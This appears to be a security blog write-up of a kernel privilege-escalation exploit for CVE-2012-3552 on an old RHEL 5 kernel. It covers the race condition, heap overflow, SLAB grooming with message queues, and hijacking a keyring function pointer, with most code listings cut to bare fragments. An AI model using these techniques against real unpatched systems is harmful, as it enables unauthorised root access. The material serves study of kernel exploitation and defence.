This is a brief walk-through of an old exploit I wrote for CVE-2012-3552. I've had these notes floating around for a long time but finally took the time to write them up properly. The exploit was targeting a RHEL 5 kernel, which is now ancient. Many, many exploitation mitigations have been added to the kernel since then, so a lot of the techniques used here no longer work. The overview of successfully exploiting the narrow race condition is, hopefully, still interesting.
- The fix
- The vulnerability
- Triggering the overflow
- Using the overflow
- Controlling the overflow
- Grooming the heap
- The final exploit
The fix
Commit f6d8bd051c391c1c0458a30b2a7abcd939329259 patched the vulnerability:
inet: add RCU protection to inet->opt
We lack proper synchronization to manipulate inet->opt ip_options
Problem is ip_make_skb() calls ip_setup_cork() and ip_setup_cork() possibly makes a copy of ipc->opt (struct ip_options), without any protection against another thread manipulating inet->opt.
Another thread can change inet->opt pointer and free old one under us.
Use RCU to protect inet->opt (changed to inet->inet_opt).
The opt
member of struct inet_sock
represents IP options associated with a socket. As the patch description explains, there was no synchronization around the opt
field which can be used to possibly trigger a use after free.
The CVE description mentions that this vulnerability might be triggered remotely. This may be possible — I didn't fully investigate that claim — but I was more interested in leveraged the bug for a local privilege escalation.
The vulnerability
We reach ip_setup_cork
in the kernel by passing the MSG_MORE
option to the sendmsg
syscall. This sets up corking for a UDP socket:
net/ipv4/ip_output.c
static int
When the kernel sets up corking for a socket, it makes a copy of the IP options. If no IP options have previously been set for corking (1), we allocate a new buffer to hold the options (2), then copy the current options into the newly allocated buffer (3). Unfortunately, there is no synchronization around the opt
pointer: another kernel thread may free opt
in between (2) and (3) which causes the use after free.
We can use this use after free to trigger memory corruption. In (3), the opt->optlen
field is used to determine the length of the options to copy. By setting a large value of opt->optlen
, we can cause a heap buffer overflow. But can we win the race condition? Can we precisely control the heap layout to overwrite something important and gain root? Let's find out!
Triggering the overflow
The existing IP options for a socket can be replaced by calling setsockopt
with the IP_OPTIONS
option. After setting the new IP options (4), the existing IP options are freed (5):
net/ipv4/ip_sockglue.c
static int
The basic outline of our exploit will use two userspace threads calling sendmsg
and setsockopt
repeatedly on the same socket:
static void
int
int
The exploit aims to achieve this interleaving of events in kernelspace to trigger the overflow:
parent (CPU 0) | child (CPU 1)
--------------------------------|--------------------------------
| /* ip_setup_cork:
| * set up IP options
| * for corked message
| */
| cork->opt = kmalloc(
| sizeof(struct ip_options) + 40,
| sk->sk_allocation
| );
|
/* do_ip_setsockopt: |
* free IP options and |
* create hole in the heap |
*/ |
ip_options_get_from_user( |
sock_net(sk), |
&opt, |
optval, |
optlen |
); |
... |
xchg( |
&inet->opt, |
opt |
); |
|
|
/* TODO: trigger another kernel |
* allocation to overwrite |
* `opt` with an invalid |
* `->optlen` field |
*/ |
|
| /* ip_setup_cork:
| * malformed IP options
| * triggers overflow
| */
| memcpy(
| cork->opt,
| opt,
| sizeof(struct ip_options)
| + opt->optlen
| );
We use sched_setaffinity(2)
to hint to the kernel that these two threads should run on different CPU cores. This helps in two ways:
- we increase the chance that
ip_setup_cork
anddo_ip_setsockopt
run concurrently - we gain greater control over the layout of the kernel heap. The kernel allocated uses a number of per-CPU caches that influence the behavior of
kmalloc
andkfree
.
Even with pinning threads to separate CPUs, I needed ~100,000 iterations on my test machine to reliably trigger the use after free and subsequent memory corruption.
Using the overflow
The target kernel uses the SLAB allocator which influences how kmalloc
and kfree
behave. The SLAB allocator aims to reduce fragmentation caused by different sized allocations being serviced from a single heap. A number of caches are defined which service allocations for common types, e.g. struct task_struct
, struct mm_struct
, etc.
There are also a number of general-purpose caches used for generic allocations, e.g. the size-32, size-64 and size-128 caches contain allocations up to 32-, 64- and 128-bytes respectively. SLAB allocation is also CPU efficient because, as each allocation in a specific cache is the same size, there is no need to maintain complex metadata for each allocation. Instead, allocation metadata is stored at the beginning of the slab and there is no metadata between individual allocations. This simplifies our exploit as we don't need to worry about corrupting any heap metadata.
Here is a rough sketch of how we want to use this overflow. First we'll groom the kernel heap to place our exploit data (AAAA
) and victim allocation in the size-64 cache, both preceded by a free block (....
).
The heap will look like this, initially:
- - --+------------+------------+-- - - - --+------------+------------+-- - -
| .... | AAAAAAAAAA | | .... | victim |
| .... | AAAAAAAAAA | | .... | allocation |
- - --+------------+------------+-- - - - --+------------+------------+-- - -
We will then use setsockopt
to place an ip_options
structure in one of the free blocks:
- - --+------------+------------+-- - - - --+------------+------------+-- - -
| opt | AAAAAAAAAA | | .... | victim |
| | AAAAAAAAAA | | .... | allocation |
- - --+------------+------------+-- - - - --+------------+------------+-- - -
By starting corking on an existing socket, a new ip_options
structure (cork->opt
from ip_setup_cork
) will be allocated in the free block preceding our victim allocation:
- - --+------------+------------+-- - - - --+------------+------------+-- - -
| opt | AAAAAAAAAA | | cork-> | victim |
| | AAAAAAAAAA | | opt | allocation |
- - --+------------+------------+-- - - - --+------------+------------+-- - -
Use the IP_OPTIONS
socket option to free the existing opt
structure:
- - --+------------+------------+-- - - - --+------------+------------+-- - -
| .... | AAAAAAAAAA | | cork-> | victim |
| .... | AAAAAAAAAA | | opt | allocation |
- - --+------------+------------+-- - - - --+------------+------------+-- - -
Next, we trigger any syscall which allows us to allocate a buffer in the size-64 cache. When interpreted as an ip_options
structure, this allocation will have an invalid length field:
- - --+------------+------------+-- - - - --+------------+------------+-- - -
| fake | AAAAAAAAAA | | cork-> | victim |
| opt | AAAAAAAAAA | | opt | allocation |
- - --+------------+------------+-- - - - --+------------+------------+-- - -
The memcpy
in ip_setup_cork
runs, using the invalid length field and overwriting both the cork->opt
allocation and the victim allocation:
- - --+------------+------------+-- - - - --+------------+------------+-- - -
| fake | AAAAAAAAAA | | fake | AAAAAAAAAA |
| opt | AAAAAAAAAA | | opt | AAAAAAAAAA |
- - --+------------+------------+-- - - - --+------------+------------+-- - -
This sketch, obviously, requires a lot of heap grooming which we'll come back to later.
Controlling the overflow
We now need two things to put the exploit together:
- a method of allocating a fake
ip_options
structure in the size-64 cache which allows us to control the->len
field - a victim allocation that will give us privileges when overwritten.
The fake ip_options
structure
To allocate the fake ip_options
structure in the size-64 cache, we need a kernel allocation between 33 and 64 bytes that we can trigger from userspace without many restrictions on the contents of the allocation. There are many different ways to do this, but I settled on the IP_MSFILTER
option to setsockopt
. This option controls multicast source filtering:
net/ipv4/ip_sockglue.c
case IP_MSFILTER:
It allows us to allocate memory of an arbitrary size (6), copy our data into the allocation (7) then immediately free it (8) by failing some basic validation. Apart from the limitation on the ismsf_numsrc
field needed to trigger the error path, there is no limit on the contents of our allocation.
The victim allocation
We are looking for something that is allocated on the size-64 cache and contains something useful to us when overwritten, e.g. a function pointer or pointer to data. The allocation also needs to be allocatable on demand so we can easily arrange the heap.
I settled on the thread_group_cred
structure for this exploit. The structure represents generic "credentials" for a process, including things like cryptographic keys and authentication tokens, that can be accessed via the add_key
, request_key
and keyctl
syscalls. The structure is allocated when forking a new process so it is easy for us to allocate it on demand.
include/linux/cred.h
;
The process_keyring
and session_keyring
members point to key
structures:
include/linux/key.h
;
The credential infrastructure in the kernel is fairly generic and the exact implementation is determined by the struct key_type
containing a table of function pointers:
include/linux/key-type.h
;
The keyctl
syscall allows a process to perform several generic operations on the current process's credentials which are implemented by the type
table of function pointers. In our exploit we can use the KEYCTL_UPDATE
flag to call through the ->update
function pointer (9) to our shellcode:
security/keys/key.c
int
There are a couple of levels indirection from our overflowed thread_group_cred
structure to the update
function pointer. We can handle this by constructing a fake key
and key_type
structures in userspace then overflowing the ->process_keyring
field to point back to userspace:
userspace:
/--> struct key:
| ...
| type: ----\
| ... |
| \--> struct key_type:
| ...
| update: --------> shellcode
| ...
|
|
|
-----------------------------+--------------------------------------------------
kernelspace: |
|
struct thread_group_cred: |
... |
process_keyring: --------/
...
The exploit data
We need another allocation on the size-64 cache which allows us to control the bytes that we overwrite thread_group_creds
structure. Of course, there already is a way of allocating on the size-64 cache: IP options! We just need to ensure that we construct a valid IP options buffer that, when interpreted as a thread_group_creds
structure, gives us control over the process_keyring
field. The raw IP options data passed from userspace is prefixed with the ip_options
structure which makes this approach less flexible.
We can use pahole
tool to dump out the size and offsets of the fields in the two structures to confirm that the process_keyring
member (at offset 24) lies after the prefixed IP options header (12 bytes in total):
struct ip_options {
__be32 faddr; /* 0 4 */
unsigned char optlen; /* 4 1 */
unsigned char srr; /* 5 1 */
unsigned char rr; /* 6 1 */
unsigned char ts; /* 7 1 */
unsigned char is_strictroute:1; /* 8: 0 1 */
unsigned char srr_is_hit:1; /* 8: 1 1 */
unsigned char is_changed:1; /* 8: 2 1 */
unsigned char rr_needaddr:1; /* 8: 3 1 */
unsigned char ts_needtime:1; /* 8: 4 1 */
unsigned char ts_needaddr:1; /* 8: 5 1 */
/* XXX 2 bits hole, try to pack */
unsigned char router_alert; /* 9 1 */
unsigned char cipso; /* 10 1 */
unsigned char __pad2; /* 11 1 */
unsigned char __data[]; /* 12 0 */
/* size: 12, cachelines: 1, members: 15 */
/* sum members: 11 */
/* sum bitfield members: 6 bits, bit holes: 1, sum bit holes: 2 bits */
/* last cacheline: 12 bytes */
};
struct thread_group_cred {
atomic_t usage; /* 0 4 */
pid_t tgid; /* 4 4 */
spinlock_t lock; /* 8 4 */
/* XXX 4 bytes hole, try to pack */
struct key * session_keyring; /* 16 8 */
struct key * process_keyring; /* 24 8 */
struct rcu_head rcu; /* 32 16 */
/* size: 48, cachelines: 1, members: 6 */
/* sum members: 44, holes: 1, sum holes: 4 */
/* last cacheline: 48 bytes */
};
We just need to find an IP option that gives us flexible control from offset 12 through 64. The IP_OPTIONS
socket option is handled by ip_options_compile
and there is, by design, very little validation of a IPOPT_RA
("Router Alert") field.
net/ipv4/ip_options.c
int
In diagram form, we can more easily see that the router advertisement gives us control over the two keyring fields:
byte offset: 0 4 8 12 16 24
thread_group_cred: [usage ][tgid ][lock ][... ][ session_keyring ][ process_keyring ]
IP options: [struct ip_options ][router advertisment ]
We don't directly control the bytes up to offset 12 because of the prefixed ip_options
header, so we'll overwrite the usage
, tgid
and lock
fields when triggering the overflow. This didn't seem to have any adverse effect in testing and can be fixed up by our shellcode later.
To summarize our exploit up to now:
- we construct a fake
key
andkey_type
structure in userspace pointing to our shellcode - we allocate a fake
thread_group_cred
structure on the kernel heap by attaching a Router Advertisement IP option to an existing socket - we fork a new victim process to allocate our victim
thread_group_cred
structure on the heap - we arrange the heap so we have the appropriate gaps before the real and fake
thread_group_cred
structures - we interleave
sendmsg
andsetsockopt
to trigger the overflow and overwrite thethread_group_cred
structure - finally, the victim process will call
keyctl(KEYCTL_UPDATE, ...)
to use the corruptedthread_group_cred
structure and trigger kernel code execution via the->update
function pointer
Grooming the heap
The whole exploit hinges on our ability to precisely groom the kernel heap. As mentioned, the kernel I'm testing on is using the default SLAB allocator. The SLAB allocator is structured like so:
- the allocator uses different caches to service different allocation requests
- each individual cache holds items of a specific type (or a specific size, for the generic size-N caches)
- a cache is backed by one or more slabs
- each slab provides a portion of contiguous memory to allocate objects from, and is prefixed with allocation metadata
In diagram form:
size-32 cache:
|
| +----------+----+----+----+----+----+----+----+----+----+----+
+-> | metadata | | .. | | | .. | .. | .. | | | |
| +----------+----+----+----+----+----+----+----+----+----+----+
|
| +----------+----+----+----+----+----+----+----+----+----+----+
+-> | metadata | .. | .. | .. | | | | .. | | .. | |
+----------+----+----+----+----+----+----+----+----+----+----+
size-64 cache:
|
| +----------+----+----+----+----+----+----+----+----+----+----+
+-> | metadata | | | | | .. | | | | | |
| +----------+----+----+----+----+----+----+----+----+----+----+
|
| +----------+----+----+----+----+----+----+----+----+----+----+
+-> | metadata | | | .. | | | | .. | | | |
| +----------+----+----+----+----+----+----+----+----+----+----+
|
| +----------+----+----+----+----+----+----+----+----+----+----+
+-> | metadata | | | | | | | | .. | .. | .. |
+----------+----+----+----+----+----+----+----+----+----+----+
The slabs become dirty over time — having a mixture of in use and free slots — as different subsystems with differing allocation patterns use the same caches. Our exploit relies on very precise layout of objects on a single slab so these dirty slabs are a problem for us.
Fresh slabs are allocated once all existing slabs have been filled. We can force the creation of a new, clean slab by allocating a large number of objects on the size-64 heap. Once we have a clean slab, the allocation pattern is deterministic on this old RHEL 5 kernel.
Luckily, the target RHEL 5 kernel exposes the /proc/slabinfo
file to unprivileged users. This file gives an overview of the current state of the various caches:
$ cat /proc/slabinfo
# name <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> : tunables <limit> <batchcount> <sharedfactor> : slabdata <active_slabs> <num_slabs> <sharedavail>
...
size-192 108 120 192 20 1 : tunables 120 60 8 : slabdata 6 6 0
size-128(DMA) 0 0 128 30 1 : tunables 120 60 8 : slabdata 0 0 0
size-128 316 330 128 30 1 : tunables 120 60 8 : slabdata 11 11 0
size-96(DMA) 0 0 128 30 1 : tunables 120 60 8 : slabdata 0 0 0
size-96 598 600 128 30 1 : tunables 120 60 8 : slabdata 20 20 0
size-64(DMA) 0 0 64 59 1 : tunables 120 60 8 : slabdata 0 0 0
size-32(DMA) 0 0 32 113 1 : tunables 120 60 8 : slabdata 0 0 0
size-64 2533 2773 64 59 1 : tunables 120 60 8 : slabdata 47 47 0
size-32 22040 22939 32 113 1 : tunables 120 60 8 : slabdata 203 203 0
kmem_cache 170 180 256 15 1 : tunables 120 60 8 : slabdata 12 12 0
...
By parsing this output while allocating objects in kernelspace, we can infer precisely when a new size-64 slab is allocated.
We now need a method of allocating a large number of objects in the size size-64 cache. Depending on the uptime and load of the system, we may need to make many hundreds of allocations to completely fill the existing slabs. We can use POSIX message queues to do this. POSIX message queues allow a process to send data to another process on the same machine via mq_send(3)
and mq_receive(3)
. If a process attempts to send a message while there is no other process ready to receive the message, then the message is copied into the kernel and placed on a message queue. Messages can be of an arbitrary size and we can choose a specific message length to force allocations to be served from the size-64 cache.
On my test kernel, the number of message queues is limited to a maximum of 256, each containing a maximum of 10 messages. Assuming no existing message queues exist, we can make 256 * 10 = 2560 allocations before reaching these limits. With 59 allocations needed to fill a size-64 slab, this is enough to completely fill 43 slabs. We can increase this number, though, using the priority system for messages.
Messages in each queue can have a priority detailing in what order messages should be received from the queue. Internally messages are sorted by priority with a red-black tree, with each node in the tree being a list of messages with the same priority. Coincidentally, the nodes in the red-black tree are allocated from the size-64 cache. By sending each message with a unique priority, we can construct a red-black tree with 9 nodes containing our 10 messages. This now allows us to trigger (256 * (10 + 9)) = 4864 allocations. This is enough to completely fill 82 size-64 slabs.
For the sake of brevity, I won't go into the full details about how to arrange the new slab in the right layout. Briefly, though, we can groom the precise layout of the fresh slab by sending and receiving 64-byte messages via a POSIX message queue, forking new process to allocate the victim thread_group_cred
structure, then allocate our fake thread_group_cred
structure using setsockopt
.
But what about other processes on the machine? Won't they accidentally interfere with our heap grooming? This is possible but there a couple of things that help us.
Firstly, the /proc/slabinfo
output gives very precise information about the number of objects allocated so we can infer if another process has allocated on our slab. This allows us to re-groom the heap before triggering the overflow
Secondly, the SLAB allocator has a number of optimizations for SMP machines that help us precisely control the heap layout. When a slab is first allocated, a number of items (cachep->num
) are reserved on the per-CPU LIFO (ac->entry
) via cache_alloc_refill
(10):
mm/slab.c
static void *
When objects are allocated from this cache, they are pulled from the per-CPU LIFO if available (11):
mm/slab.c
static inline void *
And when an object is freed, it is placed back on the per-CPU LIFO (12):
mm/slab.c
static inline void
This is done for performance reasons but it actually helps our exploit because the beginning of the newly created slab is reserved for servicing allocations from the current CPU. Because we have previously pinned our exploit threads to specific CPUs, we have a higher chance of allocating objects from this piece of contiguous memory at the beginning of the slab. As our exploit threads run in a tight loop constantly allocating and freeing objects via setsockopt
and sendmsg
, this LIFO cache also helps us ensure that the same objects are allocated for each iteration of the respective loops.
All that being said, the exploit is not 100% stable because we are at the mercy of sched_setaffinity(2)
correctly pinning our exploit threads to specific CPUs. This is not guaranteed; the setting is merely a hint to the kernel. Also, other processes on the same machine may allocate on the size-64 cache. The /proc/slabinfo
output, though, gives us fairly good visibility into the state of the size-64 cache and we can abort the exploit attempt if we detect any unexpected allocations.
The final exploit
Putting it all together, our exploit first grooms the kernel heap using POSIX message queues and sets up a specific pattern of allocations on the newly allocated slab. We then run our exploit threads until we trigger this specific sequence of events in kernelspace:
parent (CPU 0) | child (CPU 1)
| /* ip_setup_cork:
| * set up IP options
| * for corked message
| */
| cork->opt = kmalloc(
| sizeof(struct ip_options) + 40,
| sk->sk_allocation
| );
|
/* do_ip_setsockopt: |
* free IP options and |
* create hold in the heap |
*/ |
ip_options_get_from_user( |
sock_net(sk), |
&opt, |
optval, |
optlen |
); |
... |
xchg( |
&inet->opt, |
opt |
); |
|
|
/* do_ip_setsockopt: |
* immeadiately fill hole |
* with malformed IP options |
*/ |
msf = kmalloc( |
optlen, |
GFP_KERNEL |
); |
... |
copy_from_user( |
msf, |
optval, |
optlen |
) |
| /* ip_setup_cork:
| * malformed IP options
| * triggers overflow into
| * key structure
| */
| memcpy(
| cork->opt,
| opt,
| sizeof(struct ip_options)
| + opt->optlen
| );
|
|
|
| /*
| * trigger execution via
| * corrupted key structure
| * with keyctl(KEYCTL_UPDATE)
| */
| key->type->update(
| key,
| payload,
| plen
| );
🍨